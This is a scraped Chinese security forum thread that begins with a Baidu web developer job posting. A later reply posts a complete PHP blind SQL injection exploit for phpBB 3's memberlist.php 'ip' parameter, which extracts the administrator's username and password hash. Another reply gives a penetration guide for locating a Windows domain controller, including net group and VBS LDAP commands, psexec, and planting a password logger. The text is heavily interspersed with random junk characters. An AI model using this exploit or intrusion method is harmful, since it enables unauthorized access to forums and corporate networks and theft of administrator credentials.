返回列表 发帖

[招聘] 百度招聘Web前端研发工程师

  • 工作地点:北京
  • 工作年限:无要求
  • 招聘分类:前端工程师
  • 发布日期:2010/6/13
  • 截止时间:2010/12/31
  • 信息来自:Lion
职位描述-百度产品线Web端功能设计、开发和实现;
. v! I" Y6 Y8 z4 k5 T-百度产品界面操作体验改进和性能优化;. Y. m5 d! x8 f# g6 y
-Web前沿技术调研和积累
1 P/ g, M  m7 E- k: y1 w8 p  {: b' d) _1 T3 A7 X# \2 `9 ?3 {
职位要求-计算机及相关专业本科及以上学历;5 q2 T' Q' Z1 c$ S* {" @' M; u9 }
-精通JavaScript、Ajax等Web开发技术;5 {  j  K8 E7 E
-精通HTML/XHTML、CSS等网页制作技术,熟悉页面架构和布局;( x% l/ P% J& Y" P7 N9 x' {
-熟悉W3C标准,对表现与数据分离、Web语义化等有深刻理解;
; P/ e' o9 \/ j" R* e8 j/ i5 M-熟练使用Linux系统,对算法、数据结构以及后台开发程序(PHP/Java等)有掌握;" t# c7 ?- U( w( D0 r, |
-对互联网产品和Web技术有强烈兴趣,有良好的学习能力和强烈的进取心;
: z; h% a3 A( c, x' L6 ?-良好的沟通与表达能力、思路清晰,较强的动手能力与逻辑分析能力;
% R, A) d. g3 p0 ^, @5 c# Q3 K$ w, j4 d
联系方式E-mail:stsr@baidu.com
/ n3 C' f1 b' |9 L(提示:为了更好的效果,建议在投递简历时注明来自博客园)
2 R2 e( k3 l0 t* f- y) n- L联系电话:86-10-5992 5418
% |2 y5 d( c+ Z0 ?联系手机:13164234669
4 e9 Q/ r5 H5 \4 T联系人:邹先生0 y3 U$ t, b2 C6 p# t6 j
公司地址:北京市海淀区上地十街10号

 

您可能还想看的主题:

[HR]高级web研发工程师

[HR]web应用开发工程师

[HR]web安全工程师

安全宝招聘安全服务工程师

金山网络安全/开发工程师招聘

圣诞快乐。提前祝福

SpyEye 1.3.45 Loader源代码下载

知道创宇长期招聘Web安全研究员/Python Web研发工程师

北京某安全公司招聘WEB安全工程师

互动百科再告百度不正当竞争

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:悟空ing发表,本帖发表者悟空ing符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者悟空ing和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

真是‘望聘心叹’呀
- ~# X) W& b4 p0 A! x/ C2 z1 A& N- w' v/ ?
    俺学的真是杯具了   {:3_65:}

TOP

PHPBB 3.0 0day漏洞放出
#!/usr/bin/php -q -d short_open_tag=on 7 |8 s3 h; |( j& p! N+ v
<? $ O+ E9 P1 |: s4 e$ |2 Y% r
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure
% f6 @7 v/ {& ^* E6 y" Q& s";
( ?7 }7 _2 T& L7 X0 S& M- }- qecho "by Hackerz5 hackerz5x@yahoo.com
% ]2 S- D# K  Z6 c& K+ i";
8 N) u8 }! Z8 Yecho "site: http://hackerz5.com+ H9 @+ [4 h% ]" E: t7 @. h
"; 7 k# p% l' j3 O; J% v& p
echo "dork, version specific: "Powered by phpBB * 2002, 2006 phpBB Group"# d, W# T& v3 I. L+ a1 ^

* q+ O1 y) ~0 ^* u! g( }3 S5 K";
3 q" c" J  E+ X# Z/*
" D/ d3 f8 s5 A! H# |+ A- F$ U  Jworks regardless of php.ini settings ( U: v5 G5 O6 X( |
you need a global moderator account with "simple moderator" role , @& @/ K8 i; T) f) ^, ~* g
*/
6 k3 c' i6 K, B! ^0 D: F1 Kif ($argc<5) {
8 C" ]: ~7 T, c8 D  L. h+ yecho "Usage: php ".$argv[0]." host path user pass OPTIONS
+ s8 B9 E. v: k$ L, i& Y8 \";
: Q& T$ C; z" J8 E3 n5 D& I8 ^echo "host: target server (ip/hostname)
, @' V7 u4 \% n) b& D, O. o"; 2 h* Y6 M0 a4 h5 c& A$ ^" ~
echo "path: path to phpbb38 G8 u9 Q( B2 z1 E( b8 S
";
) w+ u( w$ B3 \3 Xecho "user/pass: u need a valid user account with global moderator rights
5 Y) |! c; Z. V" K"; 1 A# p" S! k! z5 X- Z. Q
echo "Options:
) N8 Q/ s3 s, q. p) M5 v! b8 ^"; ; R6 l$ m+ O, |: m" s5 @
echo " -T[prefix] specify a table prefix different from default (phpbb_)4 x7 M4 h4 W% t4 R1 m2 U0 {
"; 0 i8 j" t( v7 n7 S
echo " -p[port]: specify a port other than 80
) X+ i/ B# {/ K' C% r* f";
* M7 A9 K5 E+ ^1 cecho " -P[ip:port]: specify a proxy/ f2 Z& A1 r( ^" V2 U# _. ^9 x
"; * m* l+ w8 R4 Y
echo " -u[number]: specify a user id other than 2 (admin)
, W0 j4 ~1 r% e4 n$ q";
1 c* y0 d( f. E( b9 J+ ^6 Oecho " -x: disclose table prefix through error messages# E4 o# B+ N) b* B" j5 W! A
"; 2 u; S: _3 U( L& E& u
echo "Example:% ~/ R7 x6 _$ e7 K: D6 t% [
";
! E+ l% O! ]: fecho "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u
% k- B3 r: K7 o0 |! D' A";
6 r, q* J$ ~$ cecho "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u71 r5 p5 l% a  {
";
  }- P& E6 E3 G$ e3 rdie; 4 F4 K5 L6 S7 L/ l: T+ X9 b9 [; x
}
9 S5 b% d  e0 D& b& terror_reporting(0); + e; Y7 ]; x& n7 I7 A# c& J
ini_set("max_execution_time",0);
9 i( a- p! \) F0 dini_set("default_socket_timeout",5);
3 Q, l% P& P  I3 X4 Ffunction quick_dump($string) $ r) E) w+ ~* F! L1 j  p$ M& v
{
9 s3 T9 g/ T1 v$result='';$exa='';$cont=0;
3 g; A- L4 S3 A, Wfor ($i=0; $i<=strlen($string)-1; $i++) 4 S1 V# }3 W+ g' ^' G- M
{ # w7 l% w# a: g/ k# e" ~
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
; j- J: v8 e$ S% P+ Z0 k{$result.=" .";}
7 c1 C! g) z4 Z1 C+ |  S% X8 W- \! T( lelse
  m6 s7 r/ a; k1 N/ _% g{$result.=" ".$string[$i];} 2 ?% v, ]- M. v; C
if (strlen(dechex(ord($string[$i])))==2) . l. F) N) m4 l- v$ P4 w
{$exa.=" ".dechex(ord($string[$i]));}
* M6 k3 ~8 A8 delse / q6 ~: j' V9 M& R( q' G7 k
{$exa.=" 0".dechex(ord($string[$i]));}
, E7 }, K8 o" v- \1 b  r$ ?$cont++;if ($cont==15) {$cont=0; $result.="
0 C( i! R" i0 {! x8 T; S"; $exa.="+ |% x- ?5 t5 U9 O/ j; B
";}
9 g. @$ Q* l- U) c6 u& A} ( K8 f- P- e" k1 F9 e; L+ E
return $exa."
) K$ m4 I# u( L3 g, `* W3 p".$result;
" \0 X; `7 e% |8 ]% x1 x}
7 n4 p6 _1 v, j9 k; s8 g6 g$proxy_regex = '(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}) '; ' K  V4 ?* L1 |# s
function sendpacketii($packet)
" _7 I! Q  o1 K{ 5 H- E7 Y3 \0 r7 A. V( F8 n: F
global $proxy, $host, $port, $html, $proxy_regex; 7 e% T3 N& U' G  ^
if ($proxy=='') { 4 q* m4 d! E& E) f( ~; f' R
$ock=fsockopen(gethostbyname($host),$port); ' S, |& B; ~' d6 n7 F
if (!$ock) {
& f1 E$ U# a+ Y- Recho 'No response from '.$host.':'.$port; die;
, Q) v: f2 \3 L8 p: Q5 V  F. V} 5 ^# |2 K! j; z
}
, E# x6 P/ h' X. X9 Q. Telse {
! i0 m4 j  g: Y/ O$c = preg_match($proxy_regex,$proxy); ( `3 s7 k3 m) J5 }6 f% i* N
if (!$c) {
( Q# J" m) S. ?, C1 Decho 'Not a valid proxy...';die;   t& M0 W  ^4 i
}
' ~: v2 k% t% H$parts=explode(':',$proxy);
1 M$ x4 t/ G- r. A4 T0 @& Q! }6 Gecho "Connecting to ".$parts[0].":".$parts[1]." proxy...0 x  L0 E& Y9 Y0 ^1 l+ N" ?& r
"; - t" f& X- u5 N5 _5 I' Z
$ock=fsockopen($parts[0],$parts[1]);
6 f/ W- L4 D. r- o0 Eif (!$ock) {
$ T' K# _$ T- {1 gecho 'No response from proxy...';die; 5 r2 y" ]/ g# A+ K- ]
}
# f0 R. b9 |& Y} ! M& Z# z: c2 {% @" `) Z
fputs($ock,$packet); . y4 w) _$ K! H) h" r
if ($proxy=='') { 8 _' ^! W8 b6 `( i" e7 u; @
$html=''; # S1 S  r' g! a, g8 }1 f
while (!feof($ock)) { 7 ^, \+ b3 `4 j4 |0 p
$html.=fgets($ock);
  j, M3 K( h7 e}
/ y+ {6 ], w+ E0 s}
2 r& A9 `& I* f( V( Kelse { ) D( o& A2 F( Y4 ?( E2 G
$html=''; * o' g( |9 ?- ]9 \3 c7 l
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) { 8 i5 R8 ]7 W9 s( Z( p; Y3 Q7 X
$html.=fread($ock,1);
6 M  Q+ B) D% M* y& D, ]$ h: h: P/ n} 2 ~5 A; y- D1 K9 d% d' K) z# O! B
} . Z8 G, P& r* L
fclose($ock);
+ D3 F* @" q1 V/ Z#debug   b- _( v) ]& J; c5 U
#echo "
' U. S7 p$ ^) s0 U/ H".$html; 3 }! S4 h1 N7 \  A, r  {
} ; b" ]" N# w% B) s6 d& V
$host=$argv[1];
4 V7 C. a4 C$ ?$path=$argv[2];   i/ `+ \4 _0 v: R5 m' G6 `
$user=$argv[3];
5 K( }3 H4 j1 s9 ?2 x0 ?! Q" M$pass=$argv[4]; $ e3 |: ~& O$ D4 v
$port=80; 3 U8 [. y. [0 N. d- I& J; N* }
$prefix="PHPBB_";
0 s0 q6 y/ r& F( G* p4 }' X$user_id="2";//admin
- J+ [5 x$ u; t' ~; I+ @$discl=0;
5 M7 `3 W( A0 ]3 }9 H% Q$proxy=""; ; Z" d) D  a# c* C, g. |- G
for ($i=3; $i<=$argc-1; $i++){ 3 ~/ y- U+ e. X
$temp=$argv[$i][0].$argv[$i][1];
" S9 j* Q! ~4 s; T/ }( q7 r8 L5 Aif ($temp=="-p")
- x% B. w' e6 Q{ 3 N% S4 j$ Z+ {% N: W0 p% m) ]% E
$port=str_replace("-p","",$argv[$i]);
' d# d+ ]* X  x, v, C4 X} * e1 S1 j( g% {; N3 ?
if ($temp=="-P")
& q; `$ f1 ~) {  T3 A( p- M$ ^/ L{
+ M- n; Z0 R6 z! [( U$proxy=str_replace("-P","",$argv[$i]);
3 P* _4 ^0 Q' o2 Q$ u1 r( W6 h}
! V( p* r5 H4 v+ c# I1 yif ($temp=="-T")
' Z- B# O% i& T- h, @: a7 c{ 8 e! y: \! I/ R. i) V1 F: I& X! z/ Z) D
$prefix=str_replace("-T","",$argv[$i]); / `/ P6 R0 ]7 ?% i- m' A5 s7 o6 j
} 1 ]- n, K% |6 W+ c/ F1 `- Q
if ($temp=="-u") . }; e: l) n- D1 \
{
5 Z2 Z) D# j- `" t7 n$user_id=str_replace("-u","",$argv[$i]); " ]8 h/ b6 n6 ~; \6 I
} + ^6 P2 [; b% b2 j/ u9 Q
if ($temp=="-x")
/ k4 e3 n/ K) j, \  s8 Z2 p. G6 p{
2 N/ u% Z) n8 D* W2 c7 K# \# b2 f$ y% S$discl=1;
4 k$ ~; @: k% s4 u}
6 p  x# H5 \' E9 }+ p; D}
1 o9 E3 e! {( G5 {0 i, A* Bif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} % N# |& v8 r+ [. D& b2 F
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
( E! D. Z$ ?9 ?, `& E9 U& T$data="username=".urlencode($user);
9 R% W5 X7 _1 u8 ^7 B2 a$data.="&amp;password=".urlencode($pass);
( P2 W& c4 d$ O7 y$data.="&amp;redirect=index.php"; , j/ f5 C; M7 S1 U: N8 c6 ~
$data.="&amp;login=Login"; & Z2 u6 `9 j3 T$ Y) p
$packet="POST ".$p."ucp.php?mode=login HTTP/1.09 W5 y4 y5 c6 @
"; 1 v7 k$ F9 }, n' N1 Q' w! X
$packet.="Referer: http://$host$path/ucp.php?mode=login8 I/ M7 T: s1 [% Z4 z
";
" F6 W4 I- L- f" m/ }$packet.="Content-Type: application/x-www-form-urlencoded" \4 p0 `' ^  Q/ N+ }
"; / O0 v/ N, T- \7 R: y! P
$packet.="Accept-Encoding: text/plain# P4 B1 k" a+ u3 E, Y2 @
";
3 z4 z$ _7 |3 B7 K( |# u$packet.="Host: ".$host."7 V5 M: K, S- ]5 G# e+ r/ R
"; & i5 F# |4 A$ }" h  l
$packet.="Content-Length: ".strlen($data)."4 u& r" Q* S2 w- ]0 W# l" I
";
4 ~  w8 Y" {: h, P8 t$packet.="Connection: Close* m1 _8 t, `8 M% R6 Y( q/ s

; ^. {% O: a" ]. I";
' _  s# {1 j  d! O$packet.=$data;
4 E' r! i* n( S% vsendpacketii($packet); 8 E) ~5 ?1 ^+ s) q  n* z  y
$cookie=""; ' P" V' D0 H; u' @% Z! V; O
$temp=explode("Set-Cookie: ",$html); 1 {" J7 N; y. p( N) W
for ($i=1; $i<=count($temp)-1; $i++)
) D4 ~3 h( y+ M8 Q/ ~{
. _+ F% S6 Z' v1 _- [' u+ M$temp2=explode(" ",$temp[$i]);
4 l$ A$ {& A* G3 w! l  d$cookie.=" ".$temp2[0];
- g; _5 ^1 I; }& X} * K4 H+ {$ |) D
if (eregi("_u=1;",$cookie)) * q! m( `+ q5 y0 K- P- f2 d) k
{
2 `" n! y: y) w: `6 c7 c" t//echo $html."
8 w' g& D9 W4 U: g";//debug
( l* l( E$ K& z9 F! z9 B//die("Unable to login...");
$ U0 G  Z- ]  H6 Q}
1 T! }- b( l; q  _5 J4 G; Mecho "cookie -> ".$cookie."% H* Q: E6 N  |% c9 T) c0 Y9 w
"; ( R! w* t- T7 o" q  N
if ($discl) ) i- {- V9 o$ M! ?+ ~  ^
{ 4 n4 I, M$ a' G, C
$sql="'suntzuuuuu"; 4 _& N) K' @6 p$ d% K6 i, ~
echo "sql -> ".$sql."4 W2 b" h' b* ^
"; - X4 A) @& i9 K, S4 ]" {5 Y, X2 s
$sql=urlencode(strtoupper($sql));
) E6 _. O$ \  ?. j$data="username=";
" F+ J0 U2 b; a+ U4 T0 R2 r$data.="&amp;icq=";
: m  B$ i) o( R$ @6 W1 q& r& Z5 q$data.="&amp;email="; : ]  [: L9 A# {7 W: X
$data.="&amp;aim="; - p  k6 f1 z  t- \% p
$data.="&amp;joined_select=lt";
$ R3 W0 T8 \4 W+ a, i$data.="&amp;joined=";
: X3 e' \4 s6 g2 B$data.="&amp;yahoo=";
% Z4 ?" N$ V, s& c$data.="&amp;active_select=lt";
, Z( d$ Q& Y  x4 E. m! @5 L6 r$data.="&amp;active="; & u1 e4 _2 A: Y
$data.="&amp;msn="; ' x# h9 H7 f: i+ Y8 |+ l9 t
$data.="&amp;count_select=eq"; % y/ ^0 p! ~4 p% {% V
$data.="&amp;count="; 8 G! o1 k% O+ b9 A! `0 i  `- h
$data.="&amp;jabber=";
( V. p7 y/ c6 {$data.="&amp;sk=c";
' P& C; t5 ^* n6 s$data.="&amp;sd=a"; ! u% }8 M. x: b) o0 A8 p  Y
$data.="&amp;ip=".$sql; * ]: b7 a0 Z- K$ i; P
$data.="&amp;search_group_id=0"; . ]- \" F! F* B9 B$ `5 J
$data.="&amp;submit=Search"; 6 }" |! A( F5 H
$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0+ X# Z% a: S! w8 ]; x
";
8 R: z1 J- ]. t$packet.="Content-Type: application/x-www-form-urlencoded7 z2 x  n( K) G: r( W- \
";
. M% \" ~( a) d$packet.="Host: ".$host."0 W$ W0 Q9 J7 ~- `4 R% L
"; - N! Q$ p& D9 E$ P$ k
$packet.="Content-Length: ".strlen($data)."+ m/ q( a! G( g9 S9 _. r7 N
"; 5 |2 @6 X/ V, L! Q: w
$packet.="Connection: Close
: P- q9 r6 E" |" i6 a% b( p";
- y# S" {. R( H  x$packet.="Cookie: ".$cookie."
1 }* `) h" ]5 w% z
- t9 ?" U  H9 _, f"; ; R6 Z0 \& j% Z/ u
$packet.=$data; 4 T" P. {9 b+ y- S+ U. F* g: ~
sendpacketii($packet);
" J1 s8 _" t. i3 ^. lif (strstr($html,"You have an error in your SQL syntax")) 1 R; t3 G! D% J  l7 u! |
{
" T* h$ D$ |, b- t, a( c3 U$ P; t$temp=explode("posts",$html);
+ x4 h) v2 W3 |; f6 `0 v$temp2=explode(" ",$temp[0]);
& L$ m7 E* W$ D# M3 E# l) _& X' \$prefix=strtoupper($temp2[count($temp2)-1]); # `& O# T8 x) ^  \, w
echo "prefix -> ".$prefix."! }* s, V8 i& ]" ]  {
";sleep(2); * ?- Z4 b7 v4 Y- B& D
}
' ^1 q' H+ x5 [) O}
- l2 ?$ _' ^+ m8 y, u0 A$md5s[0]=0;//null 4 @- c# D# v& c9 A) d8 F9 ?
$md5s=array_merge($md5s,range(48,57)); //numbers 3 @5 L7 x' C( I, @
$md5s=array_merge($md5s,range(97,102));//a-f letters
% M( ^3 I, c& e+ ^" }% y//print_r(array_values($md5s));
) P: B7 a; `8 R, D- k) B$ @9 a: W$j=1;$password=""; 7 M" o( `7 T3 d- R% e$ p  R5 q
while (!strstr($password,chr(0)))
2 d1 s& c% K) I% T{ 5 t1 u/ ~0 A' r$ _- g7 n
for ($i=0; $i<=255; $i++) 5 g+ r% f/ v# @7 h4 {: W! N# A' y
{
& C* @  `/ e" t1 U2 rif (in_array($i,$md5s))
! x: w3 q% A7 f1 h1 |$ b( P1 u  l{
% L$ a! [6 Q5 {' a" [  }$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$us er_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; ! o( t$ f  W( d2 `* i
echo "sql -> ".$sql."
  c' z( O( Q# D- x6 _5 h) a# O"; ; H. U; J$ N3 r, e: k' C+ v
$sql=urlencode(strtoupper($sql));
& b+ N- P1 t6 W! u$data="username=";
/ R. [: S$ ?" `& O6 X' N( ^9 U: @; X$data.="&amp;icq="; 1 v( e0 d0 T* b" s! j% N
$data.="&amp;email="; ( {( P. f/ I+ W& x, h. w
$data.="&amp;aim=";
" ?1 D+ ]; L3 m+ ~) L/ ?$data.="&amp;joined_select=lt"; * L2 ~0 H7 j  |* u+ H
$data.="&amp;joined="; + n7 T. U# H' F2 t* A
$data.="&amp;yahoo=";
9 G- V7 \  N( }$data.="&amp;active_select=lt"; 8 X2 T0 p: `% {
$data.="&amp;active="; 5 _% g9 }  c5 a4 A
$data.="&amp;msn="; * f  B, v  q4 u; q
$data.="&amp;count_select=eq";
8 N" t1 E) k6 t3 K. m! ], @! f, _! T$data.="&amp;count=";
& Z8 C. ^$ T" L* J0 l) m8 ^$data.="&amp;jabber="; 1 ^4 i  |# B: {6 B9 U; @8 c
$data.="&amp;sk=c";
: B( Q/ m; ]# X3 \- a' J3 C$data.="&amp;sd=a"; % S( |, Q7 R; _$ C  z
$data.="&amp;ip=".$sql;
. o! w3 r% m6 |* a9 T- c5 v$data.="&amp;search_group_id=0";
* j( ^3 @# w& ?) @/ }$data.="&amp;submit=Search";
* R* \/ k, O1 f  g: ?$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0
! z1 L1 X' \. E" H6 N. N; `";
/ K$ {5 S; V* w5 l! f- j+ ~$packet.="Content-Type: application/x-www-form-urlencoded! `6 J$ k, m( h/ S0 X
";
/ N) M, X, h/ A$packet.="Host: ".$host."7 Y6 n0 w  ]+ r: ]4 N- j
"; # f4 Y  o4 @9 R& R  u; N
$packet.="Content-Length: ".strlen($data)."
4 ^- d7 R  r9 h. w7 m) B"; 8 E+ B# v- [  O; l& P5 ]
$packet.="Connection: Close
8 O! H# D- U/ r- K";
& }4 @* g6 O6 Q( [" Y; O4 G) V; v$packet.="Cookie: ".$cookie."
) ^8 ]* Z& M- y0 r1 F* J) Z. i* q
0 J! b: c4 I7 }/ f";
. C9 \% W4 A% F/ M$packet.=$data; ! \- ]' i, |# C7 u% Q, n3 o
sendpacketii($packet); ( y, L' F6 y, v  s3 D! N# J
if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]- E) f9 G3 u# y2 p+ Z
";sleep(2);break;}
: K0 T; N5 O: M/ t: n}
: F! f- _9 N* Y- X6 s# D( wif ($i==255) {die("Exploit failed...");} # N% R7 k* D- ~7 f5 o1 @
} / R- J. [. W! G
$j++;
3 D/ F& m7 L1 T; G# o# ^}
: w6 y( A7 A7 D- _$j=1;$admin="";
7 q! C  B7 H$ B( G$ v# nwhile (!strstr($admin,chr(0))) + s) s7 a+ S4 b; g6 D0 q6 q
{
& f7 W: N0 x/ G, a! }for ($i=0; $i<=255; $i++) 1 i" Q! W% S* U' i, D( B7 G  b
{
2 |+ P' @: a% D/ l6 ]) ]/ ~$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id ,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
' V6 w) ]: \2 p% oecho "sql -> ".$sql."% V9 t8 I. ]- L
"; * l' Z, L# Y. h. v! \& r
$sql=urlencode(strtoupper($sql));
$ g8 m7 y; x8 U. o9 `! T" M$data="username="; 7 l* y: H3 b: D' y& y1 E8 a
$data.="&amp;icq=";
" q$ E' D  I5 e$data.="&amp;email="; 3 U$ m6 j9 J/ Z$ p' f& E
$data.="&amp;aim="; % ~3 ]' @, r$ n
$data.="&amp;joined_select=lt";
' Y' r) Q( a/ e3 s$data.="&amp;joined=";
) b- \- ?9 x; ^* H$data.="&amp;yahoo=";
2 w2 _. @' }" J" I3 U( P$data.="&amp;active_select=lt";
6 o8 m& m3 Z5 c& f; ]' E$data.="&amp;active=";
0 ~% Y: d1 E0 W& H$data.="&amp;msn="; : E) j4 ^% b+ h0 N! [) P8 H
$data.="&amp;count_select=eq";
* U' n- k/ E2 `/ d" ^, h! C8 T$data.="&amp;count="; 6 M6 |! i# U# T6 V& O
$data.="&amp;jabber=";
  d& C/ s, u3 V! H: i: ^' w7 X$data.="&amp;sk=c"; 6 O& z: M, ]/ D, t5 W3 D/ V3 \
$data.="&amp;sd=a";
" o7 {7 K) s; A% F; o# \- L. \$data.="&amp;ip=".$sql;
! g9 |( ?1 V1 G- @: q" g% j$data.="&amp;search_group_id=0";
/ R4 c! o+ S  }$data.="&amp;submit=Search";
3 m* E" t1 M: Z1 T% n1 h$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0
5 E; z( {5 N0 ]7 X"; 2 K8 ?5 ~6 G8 [1 [$ p, |2 s- y3 s
$packet.="Content-Type: application/x-www-form-urlencoded/ K% S8 Z' m3 n1 v# V
"; ) L$ d1 l/ ?1 J$ y1 v* r, w
$packet.="Host: ".$host."& ?4 I- K5 U3 h/ L  g3 F& b
";
( I4 P3 B% x( G6 Q% d) F& m8 j8 @$packet.="Content-Length: ".strlen($data)."8 L$ P  g* B! M% j% D* @8 d: O2 |
"; # k, P* S  S, X7 u  j2 r
$packet.="Connection: Close
$ w0 D1 P2 D/ S' ]5 ~' L"; " i0 `  ^4 U$ ^4 ^2 \: _! s! \6 l
$packet.="Cookie: ".$cookie." 4 J/ i9 _* T8 h" I2 Y, J

9 `2 f# {( @8 u2 A0 c+ c% u"; 3 e) W% w9 t; f  g5 w: ?
$packet.=$data;
- W% p4 o0 S; _- {( Gsendpacketii($packet);
4 B% u2 X5 d* y+ ~8 R$ cif (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]& S* F, N, r' g
";sleep(2);break;} ( Z2 Y! q7 \( m
}
! t0 l% k& n, p- M+ b/ f8 ~' \if ($i==255) {die("Exploit failed...");} : ~) B+ s5 d, H# @, u
$j++;
* x  W  a) ~* ^* n" r} $ L. V5 W' V8 ?6 s6 Y1 ]
echo "--------------------------------------------------------------------
6 L8 }( E, |$ }& m. e7 ~6 X";
3 b3 o; k9 o% g" M- W) i; ?+ [echo "admin -> ".$admin."
$ ?# z- I4 T+ P# H+ u2 x";
" X' n$ x3 ^4 K) E/ g/ j) V; Zecho "password (md5) -> ".$password.", h* ]5 X9 x& [' ~5 b1 X; [
";
% P2 Q* V- J& F; Z+ e5 [: yecho "--------------------------------------------------------------------
* ?7 ]  A7 Q5 }: `; [" ^5 {"; & Q, R1 h/ L  ~0 ]0 d2 a
function is_hash($hash) 3 ?. t- o5 b/ I, a+ O" @& @
{
+ Q7 S- p. O6 D, A* `if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
  D' \: ?1 x$ E  M* c9 |else {return false;} * L+ V1 y9 S* u6 R! k# F+ P
} 1 M% ^# C3 y/ c4 u
if (is_hash($password)) {echo "Exploit succeeded...";} 3 N% a, }: |8 m( A! |
else {echo "Exploit failed...";}
  V. H7 o* ?$ h( H2 O?>3 U( u; a9 }9 o/ E- M
7 L+ L" o* J  K& d# A
% ]" n5 ?0 e& N6 a
! e% Q( L9 Q1 C% w3 ~- u* a* F- Z
+ v* Y: V8 Z2 [

2 Q/ \1 I6 q5 ~& X. L  N7 S/ i: D7 f5 t! @( @/ m

1 R- O' M7 V4 D; v! I# A) f
6 D6 F' F' V! f7 \9 S2 ~2 e- |
& I% V2 j. `! b; s; N
/ u. F: h9 [7 J1 [
6 T8 |8 `0 a) @& ~
# a: I" V: y  c; w' p% u# B2 i- D" v( c# ^" D5 K5 c8 ]; L2 y
( |) F/ M* f& Z
8 d: ~; I. p3 P9 u" `) P

7 N$ ?- e. b" x* F  t
7 x* U! c+ o) i* i
$ F5 u6 F8 \1 W2 m3 R公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

找内网域主服务器方法
面对域结构的内网,可能许多小菜没有经验如何去渗透。如果你能拿到主域管理员的密码,整个内网你就可以自由穿行了。主域管理员一般呆在比较重要的机器上,如果能搞定其中的一台或几台,放个密码记录器之类,相信总有一天你会拿到密码。主域服务器当然是其中最重要一台了,如何在成千台机器里判断出是哪一台呢?dos命令像●net group "domain admins" /domain●可以做为一个判断的标准,不过vbs也可以做到的,这仍然属于adsi部份的内容,代码如下: ★ set obj=GetObject("LDAP://rootDSE") wscript.echo obj.servername ★ 只用这两句代码就足够了,运行●cscript 3.vbs●,会有结果的。当然,无论是dos命令或vbs,你前提必须要在域用户的权限下。好比你得到了一个域用户的帐号密码,你可以用 psexec.exe -u -p cmd.exe这样的格式来得到域用户的shell,或你的木马本来就是与桌面交互的,登陆你木马shell的又是域用户,就可以直接运行这些命令了。 vbs的在入侵中的作用当然不只这些,当然用js或其它工具也可以实现我上述代码的功能;不过这个专栏定下的题目是vbs在hacking中的妙用,所以我们只提vbs。写完vbs这部份我和其它作者会在以后的专栏继续策划其它的题目,争取为读者带来好的有用的文章5 X+ o/ d* U- @8 y; y8 y8 Q; h

/ x9 n1 {0 n- [# E" R- @2 p8 C1 c$ q1 M& C0 Z5 ?
, X$ l9 f; p" F/ d& b* v' A5 ~
( O0 `! W7 R! D% c( Z" G0 Z+ b

6 L+ P. ]7 f: M0 }+ l! ?2 k: n0 s8 e/ S. g0 S( D: y

  y, N! @# C0 P. }9 G7 Z
8 _" X  Y6 V* g1 L/ @
  D' T3 l" M: W& v" B& {- {" ^
+ T$ a2 K" s/ H: r" ~/ Q. a% v+ J9 ~7 ^& _  A1 m8 ]

8 O# {5 ^' w+ O3 A( e* g3 s# ?
: l3 |8 Z/ f" b# {+ C, Z4 W/ v7 S5 J8 s7 {; g# T( s8 Z

% J& P) @) q3 w9 N
7 M4 o+ z! @# _
7 h" U, f, _7 r8 F7 a( N9 g+ W
% x6 k; A% {0 [8 k4 s' }4 _公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表